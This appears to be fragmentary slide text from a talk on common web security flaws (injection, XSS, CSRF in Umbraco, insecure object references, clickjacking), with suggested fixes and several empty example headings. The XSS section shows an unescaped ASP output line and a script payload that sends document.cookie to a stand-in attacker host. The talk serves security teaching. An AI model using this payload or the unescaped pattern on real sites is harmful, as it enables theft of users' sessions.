This is a non-exhaustive list
Some of the most common issues
Please chip in comments as we go
Simplest way to compromise a site is to get hold of someone's password
Potential fixes
Injection attacks are common, a lot of framework support for these now. But still need to be aware.
Also 2nd order SQL injection or similar can catch you out
Potential Fixes
Examples:
Examples:
Example:
Output a message from QS like
?message=Payment failed
Have in the page:
<%= Request["message"] %>
Change message to
><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>
Potential fixes:
Avoid Html.Raw etc
Sanitise user input
Never directly output something a user enters
In the example a set of predefined messages ?message=ERR001
Content Security Policy
Examples:
You're logged into Umbraco, get an email with a link that looks fine. Click the link, which actually submits a form to create a new admin user in your Umbraco.
The attacked has used your access to create the user, couldn't do it themselves.
Potential Fixes
Anti-Forgery tokens
Examples:
I view my order at /order/123456
I change the URL to /order/123455 and it shows me someone else's order details
Potential fixes:
Examples:
Potential fixes:
Examples:
User puts a transparent layer over the top of the site which is loaded in iframe, you think you're clicking/typing on the site you're typing in their site instead.
Potential fixes: